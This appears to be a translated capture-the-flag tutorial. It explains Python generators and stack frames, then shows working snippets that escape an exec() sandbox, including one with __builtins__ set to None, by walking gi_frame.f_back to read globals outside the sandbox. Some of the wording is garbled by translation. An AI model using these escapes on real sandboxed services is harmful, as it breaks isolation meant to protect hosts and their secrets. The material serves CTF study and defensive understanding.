preamble
I used to come across this kind of question at some big tournaments, never had time to work on it, now rehabbing it :)
Generator Introduction
A Generator is a special kind of iterator in Python that dynamically generates values during iteration without storing all the values in memory at once.
Simple Demo
A generator function is defined here, which uses theyield
statement to generate the value, each call to the generator'snext()
method, the generator executes until it encounters the nextyield
statement, and then returns theyield
statement is followed by the value of thea
value of
def f():
a = 1
while True:
yield a
a+=1
f = f()
print(next(f)) # 1
print(next(f)) # 2
It is also possible to iterate through to get all the self-values
def f():
a = 1
for i in range(1, 100):
yield a
a+=1
f = f()
for value in f:
print(value)
generator expression (math.)
Generator expressions are a compact form of creating generators in Python. Similar to list derivatives, generator expressions allow you to define generators using a concise syntax without having to explicitly write a function. The syntax of a generator expression is similar to list derivatives, but uses parentheses instead of square brackets. Generator expressions generate values one by one, rather than generating the entire sequence at once. This facilitates better memory utilization
f = (i+1 for i in range(100))
# You can use next to get the value step by step
print(next(f))
# You can also get all the values as an iteration
for value in f.
print(value)
Generator Properties
gi_code
: The code object corresponding to the generator.gi_frame
: The frame (stack frame) object corresponding to the generator.gi_running
: Whether the generator function is executing. The value of this attribute is 0 if the generator function is frozen after the field and before the next line of code in the field is executed.gi_yieldfrom
: If the generator is yielding values from another generator, a reference to that generator's object; otherwise None.gi_frame.f_locals
: A dictionary containing local variables for the current frame of the generator.
gi_frame usage
gi_frame
is a generator and coroutine related property. It points to the frame object where the generator or coroutine is currently executing, if it is executing at all. The frame object represents the current context of code execution and contains information such as local variables, executed bytecode instructions, and so on.
def my_generator():
yield 1
yield 2
yield 3
gen = my_generator()
# Get the current frame information of the generator
frame = gen.gi_frame
# Output the current frame information of the generator
print("Local Variables:", frame.f_locals)
print("Global Variables:", frame.f_globals)
print("Code Object:", frame.f_code)
print("Instruction Pointer:", frame.f_lasti)
The above example shows how to get the frame information of the generator
Introducing Stack Frames (frames)
In Python, a stack frame, also known as a frame, is a data structure used to execute code. Whenever the Python interpreter executes a function or method, it creates a new stack frame to store the function's or method's local variables, arguments, return address, and other execution-related information. These stack frames are organized into a stack, called a call stack, in the order in which they are called. (Similar to the stack in c/c++, a little reverse knowledge should be good to understand)
Stack frames contain the following important properties:f_locals
: A dictionary containing local variables for a function or method. The key is the variable name.f_globals
: A dictionary containing the global variables of the module in which the function or method resides.f_code
: A code object that contains bytecode instructions, constants, variable names, and other information about a function or method.f_lasti
: integer indicating the index of the last bytecode instruction executed.f_back
: A reference to a higher-level call stack frame used to build the call stack.
Escaping the sandbox with a frame stack
The principle is to get the globals symbol table by passing the generator's stack frame object through f_back (return to the previous frame) and thus escaping, for example:
key = "this is flag"
codes='''
def waff():
def f():
yield g.gi_frame.f_back
g = f() #generator
frame = next(g) #获取到generator的栈帧对象
b = frame.f_back.f_back.f_globals['key'] #Returns and gets the previous stack frame'sglobals
return b
b=waff()
'''
locals={}
code = compile(codes, "", "exec")
exec(code, locals, None)
print(locals["b"]) # this is flag
escaping we can then call methods outside the sandbox to execute malicious commands
The __builtins__ field in globals
__builtins__
Modules are automatically loaded when the Python interpreter starts and contain a collection of built-in functions, exceptions, and other built-in objects.
When the code is designed that way:
key = "this is flag"
codes='''
def waff():
def f():
yield g.gi_frame.f_back
g = f() #generator
frame = next(g) #获取到generator的栈帧对象
b = frame.f_back.f_back.f_globals['key'] #Returns and gets the previous stack frame'sglobals
return b
b=waff()
'''
locals={"__builtins__": None}
code = compile(codes, "", "exec")
exec(code, locals, None)
print(locals["b"])
Here's the sandbox with the__builtins__
set to empty, that is, the sandbox can not call the built-in methods, then we run this code will report an error (next method can not be used), then how to replace the next method to get the value of the generator, remember that the above said that you can traverse the form to get the value of the generator:
key = "this is flag"
codes='''
def waff():
def f():
yield g.gi_frame.f_back
g = f() #generator
frame = [i for i in g][0] #获取到generator的栈帧对象
b = frame.f_back.f_back.f_back.f_globals['key'] #Returns and gets the previous stack frame'sglobals
return b
b=waff()
'''
locals={"__builtins__": None}
code = compile(codes, "", "exec")
exec(code, locals, None)
print(locals["b"])
This will successfully get the value of the key, but it's important to note that the value of the key will not be returned until it is given to theb
When assigning a value, an extraf_back
, because we get the value of the generator with this list derivation, it has a different code object:
frame = next(g)
<frame at 0x00000235C9718440, file '', line 7, code waff>
frame = [i for i in g][0]
<frame at 0x000002708F2ED8C0, file '', line 9, code <listcomp>>
The code object of the generator that the list-push-to-style gets is thelistcomp
, so we still have to take the last stack frame, so we need to thenf_back
(used after a verb) give it a go
Some easy ways to write
Example:
q = (q.gi_frame.f_back.f_back.f_globals for _ in [1])
g = [*q][0]
- When the first line generator is created, it is not executed directly, it is just stored in memory.
- The second line unwraps the generator, and the unwrapping triggers the generator call, which is when the execution of q.gi_frame.f_back.f_back.f_globals begins.
- When exec is called, a new stack frame is created; when generator q is executed, another new stack frame is created. So when we get q.gi_frame, we need to backtrack twice to get beyond exec.
- Take another f_globals and you get the globals outside the sandbox